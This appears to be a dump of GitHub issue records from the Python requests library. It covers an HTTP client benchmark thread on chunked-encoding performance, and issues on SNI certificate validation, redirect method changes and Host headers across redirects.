are extremely stable, and show the following features:\n1. Raw socket reads are fast (duh).\n2. Go is about 80% the speed of a raw socket read.\n3. urllib3 is about 20% the speed of a raw socket read.\n4. requests is slightly slower than urllib3, which makes sense as we add a couple of stack frames for the data to pass through.\n5. httplib is slower than requests/urllib3. That's just impossible, and I suspect that we must be configuring httplib or the sockets library in a way that httplib is not.\n", "FWIW, I just merged adding `buffering=True` from @kevinburke, do your runs\ninclude that?\n\nOn Fri Dec 05 2014 at 12:04:40 PM Cory Benfield [email protected]\nwrote:\n\n> Alright, the below data comes from a machine that is doing nothing else\n> but running these tests. The last test was run with the Python -u flag\n> set, and as you can see that flag has no effect.\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 500MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:01:32 [88.6MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:21 [ 100MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:21 [ 385MiB/s] [================================>] 100%\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 503MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:01:33 [87.8MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:22 [99.3MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:20 [ 391MiB/s] [================================>] 100%\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 506MiB/s] [================================>] 100%\n> BENCH 
HTTPLIB:\n> 8GiB 0:01:31 [89.1MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:21 [ 389MiB/s] [================================>] 100%\n> \n> These numbers are extremely stable, and show the following features:\n> 1. Raw socket reads are fast (duh).\n> 2. Go is about 80% the speed of a raw socket read.\n> 3. urllib3 is about 20% the speed of a raw socket read.\n> 4. requests is slightly slower than urllib3, which makes sense as we\n> add a couple of stack frames for the data to pass through.\n> 5. httplib is slower than requests/urllib3. That's just impossible,\n> and I suspect that we must be configuring httplib or the sockets library in\n> a way that httplib is not.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65829335\n> .\n", "Cory - see the latest version of the bench client which turns on the\nbuffering=True in httplib (as requests/urllib3 do)\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Fri, Dec 5, 2014 at 10:04 AM, Cory Benfield [email protected]\nwrote:\n\n> Alright, the below data comes from a machine that is doing nothing else\n> but running these tests. 
The last test was run with the Python -u flag\n> set, and as you can see that flag has no effect.\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 500MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:01:32 [88.6MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:21 [ 100MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:21 [ 385MiB/s] [================================>] 100%\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 503MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:01:33 [87.8MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:22 [99.3MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:20 [ 391MiB/s] [================================>] 100%\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 506MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:01:31 [89.1MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:21 [ 389MiB/s] [================================>] 100%\n> \n> These numbers are extremely stable, and show the following features:\n> 1. Raw socket reads are fast (duh).\n> 2. Go is about 80% the speed of a raw socket read.\n> 3. urllib3 is about 20% the speed of a raw socket read.\n> 4. requests is slightly slower than urllib3, which makes sense as we\n> add a couple of stack frames for the data to pass through.\n> 5. httplib is slower than requests/urllib3. 
That's just impossible,\n> and I suspect that we must be configuring httplib or the sockets library in\n> a way that httplib is not.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65829335\n> .\n", "Yeah, that fixes the performance behaviour of httplib to make far more sense.\n\nNew results and conclusions:\n\n```\nPython 2.7.6\ngo version go1.2.1 linux/amd64\nBENCH SOCKET:\n 8GiB 0:00:16 [ 499MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:01:12 [ 113MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:21 [ 100MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:20 [ 391MiB/s] [================================>] 100%\n```\n1. Raw socket reads are fast (duh).\n2. Go is about 80% the speed of a raw socket read.\n3. httplib is just under 25% the speed of a raw socket read.\n4. urllib3 is about 20% the speed of a raw socket read, adding some small overhead to httplib.\n5. requests is slightly slower than urllib3, which makes sense as we add a couple of stack frames for the data to pass through.\n", "So, arguably the real cost here is httplib. Speeding this up requires getting httplib out of the way.\n\nI'm interested to work out what part of httplib is costing us though. I think profiling `bench_httplib.py` is a good next step.\n", "I've ruled out the conversion of the socket to a file object through `socket.makefile` by adding that line to the `bench_socket.py` test, that doesn't slow it down at all. 
Weirdly, it appears to make it faster.\n", "The answer is almost certainly the transfer-encoding: chunked handling.\nSee: https://github.com/alex/http-client-bench/pull/6 , switching to\nContent-Length on the server produces some unexpected results.\n\nOn Fri Dec 05 2014 at 12:24:53 PM Cory Benfield [email protected]\nwrote:\n\n> So, arguably the real cost here is httplib. Speeding this up requires\n> getting httplib out of the way.\n> \n> I'm interested to work out what part of httplib is costing us though. I\n> think profiling bench_httplib.py is a good next step.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65831653\n> .\n", "Interesting.\n\nThe chunked handling is almost certainly the problem, and I'm not really surprised that go handles it better, especially as chunked is the default HTTP mode for go.\n\nHowever, requests being faster than a raw socket is...unexpected!\n\nOne thing worth noting: if the socket wasn't decoding the chunked encoding in the previous tests then it got an unfair advantage, as it was actually reading less data than the other methods were! They were all reading the chunked headers as well as the 8GB of data.\n\nThis leads to a follow-on question: do we still think all of these methods are actually reading the same amount of data?\n", "Yes, the socket layer was cheating, it didn't decode the chunked metadata,\nand technically read a bit less. 
It was there as a baseline for \"how fast\ncan we read\", not to prove anything.\n\nOn Fri Dec 05 2014 at 12:33:10 PM Cory Benfield [email protected]\nwrote:\n\n> Interesting.\n> \n> The chunked handling is almost certainly the problem, and I'm not really\n> surprised that go handles it better, especially as chunked is the default\n> HTTP mode for go.\n> \n> However, requests being faster than a raw socket is...unexpected!\n> \n> One thing worth noting: if the socket wasn't decoding the chunked encoding\n> in the previous tests then it got an unfair advantage, as it was actually\n> reading less data than the other methods were! They were all reading the\n> chunked headers as well as the 8GB of data.\n> \n> This leads to a follow-on question: do we still think all of these methods\n> are actually reading the same amount of data?\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65833299\n> .\n", "I wouldn't be surprised if this is related to the chunk size that we're reading off the socket at a time. \n", "Cake for @alex for being super helpful :cake:\n", "@nelhage did some stracing of the various examples (in the transfer\nencoding: chunked case) https://gist.github.com/nelhage/dd6490fbc5cfb815f762\nare the results. It looks like there's a bug in httplib which results in it\nnot always reading a full chunk off the socket.\n\nOn Mon Dec 08 2014 at 9:05:14 AM Kenneth Reitz [email protected]\nwrote:\n\n> Cake for @alex https://github.com/alex for being super helpful [image:\n> :cake:]\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-66147998\n> .\n", "So what we have here is a bug in a standard library that no one is really maintaining? (@Lukasa has at least 2 patch sets that have been open for >1 year.) 
Maybe I'll raise a stink on a list somewhere tonight\n", "Someone (I might get to it, unclear) probably needs to drill down with pdb\nor something and figure out what exact code is generating those 20-byte\nreads so we can put together a good bug report.\n\nOn Mon Dec 08 2014 at 9:14:09 AM Ian Cordasco [email protected]\nwrote:\n\n> So what we have here is a bug in a standard library that no one is really\n> maintaining? (@Lukasa https://github.com/Lukasa has at least 2 patch\n> sets that have been open for >1 year.) Maybe I'll raise a stink on a list\n> somewhere tonight\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-66149522\n> .\n", "I'll try to fit that in tonight or tomorrow if no one else gets to it.\n", "So, any news on the root cause? What's generating these short reads, and how much does the situation improve without them?\n", "@kislyuk Not as far as I'm aware. Hopefully I'll have some time to chase it down this christmas holiday.\n", "Thanks @Lukasa. I'm dealing with a performance issue where download speed on a chunked response using urllib3/requests is much slower than with curl and other libraries, and trying to understand if this is the culprit.\n" ]
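The thread above attributes the slowdown to httplib's handling of `Transfer-Encoding: chunked` (including the short 20-byte reads seen in the strace output). As a rough illustration of what a chunked body looks like on the wire — an illustrative decoder, not the httplib implementation — consider:

```python
def decode_chunked(raw: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body held fully in memory.

    Each chunk is '<hex size>\r\n<data>\r\n'; a zero-size chunk ends the body.
    """
    body = b""
    pos = 0
    while True:
        # Read the chunk-size line (hexadecimal length, then CRLF).
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol], 16)
        pos = eol + 2
        if size == 0:          # terminating zero-length chunk
            break
        body += raw[pos:pos + size]
        pos += size + 2        # skip the chunk data and its trailing CRLF
    return body

# Example: two chunks ("Wiki" and "pedia") followed by the terminator.
wire = b"4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n"
print(decode_chunked(wire))   # b'Wikipedia'
```

A parser like this has to interleave many small metadata reads with the data reads, which is why a raw socket that skips the decoding (as the benchmark's baseline did) reads strictly less work than an HTTP client that does it properly.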
https://api.github.com/repos/psf/requests/issues/2370
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2370/labels{/name}
https://api.github.com/repos/psf/requests/issues/2370/comments
https://api.github.com/repos/psf/requests/issues/2370/events
https://github.com/psf/requests/issues/2370
50,959,784
MDU6SXNzdWU1MDk1OTc4NA==
2,370
question of urlencode
{ "avatar_url": "https://avatars.githubusercontent.com/u/924733?v=4", "events_url": "https://api.github.com/users/wangcc/events{/privacy}", "followers_url": "https://api.github.com/users/wangcc/followers", "following_url": "https://api.github.com/users/wangcc/following{/other_user}", "gists_url": "https://api.github.com/users/wangcc/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/wangcc", "id": 924733, "login": "wangcc", "node_id": "MDQ6VXNlcjkyNDczMw==", "organizations_url": "https://api.github.com/users/wangcc/orgs", "received_events_url": "https://api.github.com/users/wangcc/received_events", "repos_url": "https://api.github.com/users/wangcc/repos", "site_admin": false, "starred_url": "https://api.github.com/users/wangcc/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/wangcc/subscriptions", "type": "User", "url": "https://api.github.com/users/wangcc", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-04T10:36:47Z
2021-09-08T23:06:52Z
2014-12-04T10:41:29Z
NONE
resolved
{ "avatar_url": "https://avatars.githubusercontent.com/u/924733?v=4", "events_url": "https://api.github.com/users/wangcc/events{/privacy}", "followers_url": "https://api.github.com/users/wangcc/followers", "following_url": "https://api.github.com/users/wangcc/following{/other_user}", "gists_url": "https://api.github.com/users/wangcc/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/wangcc", "id": 924733, "login": "wangcc", "node_id": "MDQ6VXNlcjkyNDczMw==", "organizations_url": "https://api.github.com/users/wangcc/orgs", "received_events_url": "https://api.github.com/users/wangcc/received_events", "repos_url": "https://api.github.com/users/wangcc/repos", "site_admin": false, "starred_url": "https://api.github.com/users/wangcc/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/wangcc/subscriptions", "type": "User", "url": "https://api.github.com/users/wangcc", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2370/reactions" }
https://api.github.com/repos/psf/requests/issues/2370/timeline
null
completed
null
null
false
[ "Hey @wangcc I expect you resolved whatever problem you had. In the future, please don't delete the description of the issue, even if you filed it on the wrong project. Issues that have had their content edited out are confusing and unhelpful to most people.\n" ]
https://api.github.com/repos/psf/requests/issues/2369
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2369/labels{/name}
https://api.github.com/repos/psf/requests/issues/2369/comments
https://api.github.com/repos/psf/requests/issues/2369/events
https://github.com/psf/requests/pull/2369
50,913,544
MDExOlB1bGxSZXF1ZXN0MjU0NjQ2MDE=
2,369
Set connection timeouts for HTTPS proxy attempts.
{ "avatar_url": "https://avatars.githubusercontent.com/u/234019?v=4", "events_url": "https://api.github.com/users/kevinburke/events{/privacy}", "followers_url": "https://api.github.com/users/kevinburke/followers", "following_url": "https://api.github.com/users/kevinburke/following{/other_user}", "gists_url": "https://api.github.com/users/kevinburke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinburke", "id": 234019, "login": "kevinburke", "node_id": "MDQ6VXNlcjIzNDAxOQ==", "organizations_url": "https://api.github.com/users/kevinburke/orgs", "received_events_url": "https://api.github.com/users/kevinburke/received_events", "repos_url": "https://api.github.com/users/kevinburke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinburke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinburke/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinburke", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-12-04T00:33:48Z
2021-09-08T09:01:10Z
2014-12-04T02:57:41Z
CONTRIBUTOR
resolved
Fixes #2336
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2369/reactions" }
https://api.github.com/repos/psf/requests/issues/2369/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2369.diff", "html_url": "https://github.com/psf/requests/pull/2369", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2369.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2369" }
true
[ "@kevinburke Wrong repo. ;) Merge to urllib3 first, then we'll take the fix.\n", "Sorry, that wasn't clear, it's been a long day (just got off a flight, LHR -> SFO).\n\nWhat I meant was: we'll bring in a whole urllib3 when we move to the next release, so we shouldn't merge an individual fix.\n" ]
https://api.github.com/repos/psf/requests/issues/2368
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2368/labels{/name}
https://api.github.com/repos/psf/requests/issues/2368/comments
https://api.github.com/repos/psf/requests/issues/2368/events
https://github.com/psf/requests/issues/2368
50,911,684
MDU6SXNzdWU1MDkxMTY4NA==
2,368
api.dribbble.com SSL certificate does not validate
{ "avatar_url": "https://avatars.githubusercontent.com/u/1097349?v=4", "events_url": "https://api.github.com/users/joealcorn/events{/privacy}", "followers_url": "https://api.github.com/users/joealcorn/followers", "following_url": "https://api.github.com/users/joealcorn/following{/other_user}", "gists_url": "https://api.github.com/users/joealcorn/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/joealcorn", "id": 1097349, "login": "joealcorn", "node_id": "MDQ6VXNlcjEwOTczNDk=", "organizations_url": "https://api.github.com/users/joealcorn/orgs", "received_events_url": "https://api.github.com/users/joealcorn/received_events", "repos_url": "https://api.github.com/users/joealcorn/repos", "site_admin": false, "starred_url": "https://api.github.com/users/joealcorn/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/joealcorn/subscriptions", "type": "User", "url": "https://api.github.com/users/joealcorn", "user_view_type": "public" }
[]
closed
true
null
[]
null
9
2014-12-04T00:09:04Z
2021-09-08T23:06:53Z
2014-12-04T14:38:21Z
CONTRIBUTOR
resolved
Built something with dribbble's API recently and noticed this. This very may well be the fault of dribbble, but I don't know enough to diagnose. It works in browsers and curl, so it seems something's up with requests. ssllabs shows the cert presented as a wildcard certificate https://www.ssllabs.com/ssltest/analyze.html?d=api.dribbble.com However when connecting with requests 2.5.0 on python 2.7.8 an `SSLError` is raised `SSLError: hostname 'api.dribbble.com' doesn't match either of 'dribbble.com', 'www.dribbble.com'`
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2368/reactions" }
https://api.github.com/repos/psf/requests/issues/2368/timeline
null
completed
null
null
false
[ "(Pdb) self.sock.getpeercert()\n{'notAfter': 'Mar 26 12:00:00 2015 GMT', 'subjectAltName': (('DNS', 'dribbble.com'), ('DNS', 'www.dribbble.com')), 'subject': ((('businessCategory', u'Private Organization'),), (('1.3.6.1.4.1.311.60.2.1.3', u'US'),), (('1.3.6.1.4.1.311.60.2.1.2', u'Massachusetts'),), (('serialNumber', u'001031096'),), (('streetAddress', u'Ste. 202'),), (('streetAddress', u'16 Front St.'),), (('postalCode', u'01970'),), (('countryName', u'US'),), (('stateOrProvinceName', u'Massachusetts'),), (('localityName', u'Salem'),), (('organizationName', u'Dribbble LLC'),), (('commonName', u'dribbble.com'),))}\n\nSo, the ssl package is telling us it does not have a wildcard. This is really strange because both ssllabs and symantec(https://ssltools.websecurity.symantec.com/checker/views/certCheck.jsp) are saying it presents as a wildcard.\n\nI think there's something up with dribbble because I can send requests to soundcloud over ssl just fine. \n", "I'm travelling, so I can't debug this properly, but my first instinct is that this is an SNI issue. Does it work fine using requests + Python 3?\n", "So that's also my first instinct @Lukasa but I don't think `getpeercert` would remove a wildcard `subjectAltName` entry randomly. Still, I'd like to know from @EthanBlackburn or @buttscicles what happens on Python 3 (preferably 3.3 or 3.4).\n", "```\nPython 3.3.5 (default, Sep 29 2014, 15:50:30)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.51)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> requests.__version__\n'2.5.0'\n>>> requests.get('https://api.dribbble.com')\n<Response [200]>\n>>>\n```\n", "Yeah... so it would seem our intuition was correct. Can you try again on python 2.x after doing `pip install -U requests[security]`?\n", "We have a winner! 
SNI is the problem here.\n\nYou can fix this problem on Python 2 by following the [SNI instructions here](https://stackoverflow.com/questions/18578439/using-requests-with-tls-doesnt-give-sni-support/18579484#18579484).\n", "I beat @Lukasa to commenting on an issue! Holy smokes!\n", "The `-U` flag didn't seem to work for the bundle, I had to uninstall and then reinstall, but that did work, thank you!\n", "In the future there's also `--force-reinstall` :)\n" ]
https://api.github.com/repos/psf/requests/issues/2367
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2367/labels{/name}
https://api.github.com/repos/psf/requests/issues/2367/comments
https://api.github.com/repos/psf/requests/issues/2367/events
https://github.com/psf/requests/issues/2367
50,891,603
MDU6SXNzdWU1MDg5MTYwMw==
2,367
requests.post() issues a GET with verify=False on insecure ssl environment
{ "avatar_url": "https://avatars.githubusercontent.com/u/1216869?v=4", "events_url": "https://api.github.com/users/kevinlondon/events{/privacy}", "followers_url": "https://api.github.com/users/kevinlondon/followers", "following_url": "https://api.github.com/users/kevinlondon/following{/other_user}", "gists_url": "https://api.github.com/users/kevinlondon/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinlondon", "id": 1216869, "login": "kevinlondon", "node_id": "MDQ6VXNlcjEyMTY4Njk=", "organizations_url": "https://api.github.com/users/kevinlondon/orgs", "received_events_url": "https://api.github.com/users/kevinlondon/received_events", "repos_url": "https://api.github.com/users/kevinlondon/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinlondon/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinlondon/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinlondon", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-12-03T20:54:47Z
2021-09-08T23:06:53Z
2014-12-03T21:52:49Z
NONE
resolved
I did a search to see if I could find any similar issues prior to filing the bug. It seems like something within the way urllib3 is behaving, in particular, but I'm not sure. I have an API endpoint where GET is disabled so only POST and OPTIONS are valid methods. It works fine when I interact with it when it's hosted on HTTP but when I host it over HTTPS, the response is a 405. It behaves the same if I'm using either `requests.post()` or `requests.Session().post()`. Specifically, here's an example of the request / response cycle: ``` >>> resp = requests.Session().post(url, headers=self._headers, verify=False) >>> resp.content '{"code": 405, "total": null, "version": 1, "errors": [{"message": "Method \'GET\' not allowed."}]' ``` On an HTTP environment, with the same call (including `verify=False`), I get the expected response. I've also been able to successfully hit the same URL with the same headers using Postman and cURL without issue on the HTTPS server. Is this a bug with the library or am I doing something wrong?
{ "avatar_url": "https://avatars.githubusercontent.com/u/1216869?v=4", "events_url": "https://api.github.com/users/kevinlondon/events{/privacy}", "followers_url": "https://api.github.com/users/kevinlondon/followers", "following_url": "https://api.github.com/users/kevinlondon/following{/other_user}", "gists_url": "https://api.github.com/users/kevinlondon/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinlondon", "id": 1216869, "login": "kevinlondon", "node_id": "MDQ6VXNlcjEyMTY4Njk=", "organizations_url": "https://api.github.com/users/kevinlondon/orgs", "received_events_url": "https://api.github.com/users/kevinlondon/received_events", "repos_url": "https://api.github.com/users/kevinlondon/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinlondon/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinlondon/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinlondon", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2367/reactions" }
https://api.github.com/repos/psf/requests/issues/2367/timeline
null
completed
null
null
false
[ "What is the output of `resp.history`. It's plausible you're being redirected and the status code we're getting is causing us to switch the request to a `GET` (as we should be).\n", "Ah, okay. Thank you for the pointer. In history was a Response [301] and I traced it to the fact that nginx was redirecting me from http:// to https:// with the response. I should have used HTTPS to begin with. Thanks for the help!\n" ]
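The diagnosis above — nginx's http→https 301 turning the POST into a GET — follows standard redirect rules. A small sketch of the method-rewriting logic (an approximation of what `Session.resolve_redirects` does, not the actual requests code):

```python
def redirected_method(method: str, status: int) -> str:
    """Return the method used for the follow-up request after a redirect.

    Mirrors browser-compatible behaviour: 303 (See Other) becomes GET,
    and historically 301/302 turn a POST into a GET as well.
    """
    if status == 303 and method != "HEAD":
        return "GET"
    if status in (301, 302) and method == "POST":
        return "GET"
    return method

print(redirected_method("POST", 301))  # GET -- the behaviour seen above
print(redirected_method("PUT", 302))   # PUT
```

Inspecting `resp.history`, as suggested in the thread, is the quickest way to spot that a redirect happened at all.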
https://api.github.com/repos/psf/requests/issues/2366
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2366/labels{/name}
https://api.github.com/repos/psf/requests/issues/2366/comments
https://api.github.com/repos/psf/requests/issues/2366/events
https://github.com/psf/requests/issues/2366
50,789,806
MDU6SXNzdWU1MDc4OTgwNg==
2,366
redirected request with a wrong host header
{ "avatar_url": "https://avatars.githubusercontent.com/u/860837?v=4", "events_url": "https://api.github.com/users/hakulat/events{/privacy}", "followers_url": "https://api.github.com/users/hakulat/followers", "following_url": "https://api.github.com/users/hakulat/following{/other_user}", "gists_url": "https://api.github.com/users/hakulat/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/hakulat", "id": 860837, "login": "hakulat", "node_id": "MDQ6VXNlcjg2MDgzNw==", "organizations_url": "https://api.github.com/users/hakulat/orgs", "received_events_url": "https://api.github.com/users/hakulat/received_events", "repos_url": "https://api.github.com/users/hakulat/repos", "site_admin": false, "starred_url": "https://api.github.com/users/hakulat/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/hakulat/subscriptions", "type": "User", "url": "https://api.github.com/users/hakulat", "user_view_type": "public" }
[]
closed
true
null
[]
null
13
2014-12-03T06:43:23Z
2021-09-08T23:05:54Z
2014-12-18T08:45:06Z
NONE
resolved
for example: r = requests.get(url, allow_redirects=True, headers={"Host":"www.baidu.com"}) first response is: 302 with location: http://www.abc.com/index.html then the followed request is also with the Host of www.baidu.com, for 302 location is a abs Request-URI, should not the request with the host of www.abc.com?
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2366/reactions" }
https://api.github.com/repos/psf/requests/issues/2366/timeline
null
completed
null
null
false
[ "Hi @wttang \n\nFor the most part, we actively discourage users from specifying they're own `Host` header. Because we discourage users from handling their own `Host` header, we do not remove it on redirect because 99% of the time there's no need for us to do so. By specifying this header yourself and not handling redirects yourself, we continue using the `Host` header.\n\nWe very well could just always attempt to remove the `Host` header but I'm -0.5 on this matter because it will almost certainly be removed by someone in the future regardless of how well we comment the surrounding lines of code. If you're making requests that require you to override things like this from requests, you should be prepared to also be handling redirects yourself.\n", "I don't think we can remove the host header on redirect. If the user specifies the host header they're suggesting that they know more than we do, and in that situation we shouldn't override it.\n", "Yeah. I agree with @Lukasa. By specifying a custom header like this, you're basically asserting that you know what you want to happen and if something unexpected happens then you have to remedy it, even if that means having to manually handle redirects\n", "the behavior of requests is not the same with a modern broswer. just try www2.baidu.com,\nI think the behavior of chrome or firefox is more reasonable\n", "@wttang It's not at all clear to me what you mean by that. www2.baidu.com works fine. Chrome or Firefox don't let you choose what host header you set, so they don't have _any_ behaviour in this situation.\n", "@Lukasa ok, i got it. you could try with curl -H\"Host: xxx.yyy.com\" url. (curl/7.19.7)\nthe behavior of curl is also use new-host header, if a 302 return, not user set one.\n", "@wttang Yeah, here we have a philosophical difference with cURL.\n\nWhen you override our default headers we assume that you know better than us. This affects all kinds of things. 
